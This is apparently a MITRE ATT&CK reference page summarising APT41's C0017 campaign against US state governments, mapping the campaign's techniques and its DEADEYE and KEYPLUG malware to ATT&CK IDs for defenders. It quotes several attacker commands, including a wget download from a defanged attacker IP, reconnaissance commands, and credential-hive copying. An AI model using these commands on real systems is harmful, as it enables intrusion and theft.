ATT&CKReferencesMandiant APT41

Mandiant APT41

Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.

Open the source

Techniques0

Not cited by any technique.

Groups0

None recorded.

Software2

Campaigns1

Procedure examples52

TechniqueUsed byProcedure example
T1001.003
Protocol or Service Impersonation
CampaignC0017

During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.

T1003.002
Security Account Manager
CampaignC0017

During C0017, APT41 copied the `SAM` and `SYSTEM` Registry hives for credential harvesting.

T1005
Data from Local System
CampaignC0017

During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information (PII) from victim networks.

T1016
System Network Configuration Discovery
CampaignC0017

During C0017, APT41 used `cmd.exe /c ping %userdomain%` for discovery.

T1016
System Network Configuration Discovery
MalwareDEADEYE

DEADEYE can discover the DNS domain name of a targeted system.

T1027
Obfuscated Files or Information
CampaignC0017

During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.

T1027.002
Software Packing
CampaignC0017

During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.

T1027.009
Embedded Payloads
MalwareDEADEYE

The DEADEYE.EMBED variant of DEADEYE has the ability to embed payloads inside of a compiled binary.

T1027.013
Encrypted/Encoded File
MalwareDEADEYE

DEADEYE has encrypted its payload.

T1027.013
Encrypted/Encoded File
MalwareKEYPLUG

KEYPLUG can use a hardcoded one-byte XOR encoded configuration file.

T1033
System Owner/User Discovery
CampaignC0017

During C0017, APT41 used `whoami` to gather information from victim machines.

T1036.004
Masquerade Task or Service
MalwareDEADEYE

DEADEYE has used `schtasks /change` to modify scheduled tasks including `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility, \Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`.

T1036.004
Masquerade Task or Service
CampaignC0017

During C0017, APT41 used `SCHTASKS /Change` to modify legitimate scheduled tasks to run malicious code.

T1036.005
Match Legitimate Resource Name or Location
CampaignC0017

During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.

T1041
Exfiltration Over C2 Channel
CampaignC0017

During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.

T1048.003
Exfiltration Over Unencrypted Non-C2 Protocol
CampaignC0017

During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.

T1053.005
Scheduled Task
CampaignC0017

During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`.

T1059.003
Windows Command Shell
CampaignC0017

During C0017, APT41 used `cmd.exe` to execute reconnaissance commands.

T1059.003
Windows Command Shell
MalwareDEADEYE

DEADEYE can run `cmd /c copy /y /b C:\Users\public\syslog_6-*.dat C:\Users\public\syslog.dll` to combine separated sections of code into a single DLL prior to execution.

T1059.007
JavaScript
CampaignC0017

During C0017, APT41 deployed JScript web shells on compromised systems.

T1069.002
Domain Groups
Tooldsquery

dsquery can be used to gather information on permission groups within a domain.

T1071.001
Web Protocols
MalwareKEYPLUG

KEYPLUG has the ability to communicate over HTTP and WebSocket Protocol (WSS) for C2.

T1071.001
Web Protocols
CampaignC0017

During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.

T1074.001
Local Data Staging
CampaignC0017

During C0017, APT41 copied the local `SAM` and `SYSTEM` Registry hives to a staging directory.

T1082
System Information Discovery
MalwareDEADEYE

DEADEYE can enumerate a victim computer's volume serial number and host name.

T1082
System Information Discovery
Tooldsquery

dsquery has the ability to enumerate various information, such as the operating system and host name, for systems within a domain.

T1087.002
Domain Account
Tooldsquery

dsquery can be used to gather information on user accounts within a domain.

T1090
Proxy
MalwareKEYPLUG

KEYPLUG has used Cloudflare CDN associated infrastructure to redirect C2 communications to malicious domains.

T1090
Proxy
CampaignC0017

During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.

T1095
Non-Application Layer Protocol
MalwareKEYPLUG

KEYPLUG can use TCP and KCP (KERN Communications Protocol) over UDP for C2 communication.

T1102
Web Service
CampaignC0017

During C0017, APT41 used the Cloudflare services for C2 communications.

T1102.001
Dead Drop Resolver
CampaignC0017

During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.

T1102.001
Dead Drop Resolver
MalwareKEYPLUG

The KEYPLUG Windows variant has retrieved C2 addresses from encoded data in posts on tech community forums.

T1105
Ingress Tool Transfer
CampaignC0017

During C0017, APT41 downloaded malicious payloads onto compromised systems.

T1106
Native API
MalwareDEADEYE

DEADEYE can execute the `GetComputerNameA` and `GetComputerNameExA` WinAPI functions.

T1124
System Time Discovery
MalwareKEYPLUG

KEYPLUG can obtain the current tick count of an infected computer.

T1134
Access Token Manipulation
CampaignC0017

During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\SYSTEM` privilege escalation.

T1140
Deobfuscate/Decode Files or Information
CampaignC0017

During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.

T1140
Deobfuscate/Decode Files or Information
MalwareKEYPLUG

KEYPLUG can decode its configuration file to determine C2 protocols.

T1140
Deobfuscate/Decode Files or Information
MalwareDEADEYE

DEADEYE has the ability to combine multiple sections of a binary which were broken up to evade detection into a single .dll prior to execution.

T1190
Exploit Public-Facing Application
CampaignC0017

During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.

T1218.007
Msiexec
MalwareDEADEYE

DEADEYE can use `msiexec.exe` for execution of malicious DLL.

T1218.011
Rundll32
MalwareDEADEYE

DEADEYE can use `rundll32.exe` for execution of living off the land binaries (lolbin) such as `SHELL32.DLL`.

T1480
Execution Guardrails
MalwareDEADEYE

DEADEYE can ensure it executes only on intended systems by identifying the victim's volume serial number, hostname, and/or DNS domain.

T1505.003
Web Shell
CampaignC0017

During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.

T1560.003
Archive via Custom Method
CampaignC0017

During C0017, APT41 hex-encoded PII data prior to exfiltration.

T1564.004
NTFS File Attributes
MalwareDEADEYE

The DEADEYE.EMBED variant of DEADEYE can embed its payload in an alternate data stream of a local file.

T1567
Exfiltration Over Web Service
CampaignC0017

During C0017, APT41 used Cloudflare services for data exfiltration.

T1573.002
Asymmetric Cryptography
MalwareKEYPLUG

KEYPLUG can use TLS-encrypted WebSocket Protocol (WSS) for C2.

T1574
Hijack Execution Flow
CampaignC0017

During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table (IAT) within legitimate Microsoft binaries.

Showing the first 50.

Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.